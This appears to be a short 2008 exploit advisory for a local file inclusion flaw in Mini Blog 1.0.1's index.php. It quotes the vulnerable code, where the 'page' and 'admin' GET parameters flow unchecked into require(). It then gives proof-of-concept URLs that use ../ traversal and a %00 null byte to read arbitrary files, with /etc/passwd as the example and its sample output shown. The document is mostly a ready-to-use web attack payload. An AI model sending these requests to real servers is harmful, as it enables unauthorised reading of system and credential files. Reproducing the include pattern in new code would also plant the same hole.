/* $Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $ Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities Discovered by cOndemned Download : http://www.bpowerhouse.info/mini_blog.htm Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;* */ Source of index.php [...] 7. $page = !empty($_GET['page']) ? $_GET['page'] : ""; 8. $admin = !empty($_GET['admin']) ? $_GET['admin'] : ""; [...] 77. if (($page != "") && file_exists("page/" . $page . ".php")) { 78. require("page/" . $page . ".php"); 79. } else if (($admin != "") && file_exists("admin/" . $admin . ".php")) { 80. require("admin/" . $admin . ".php"); [...] Proof of Concept http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00 http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00 for example request : http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00 ...might give result like this : root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon... EoF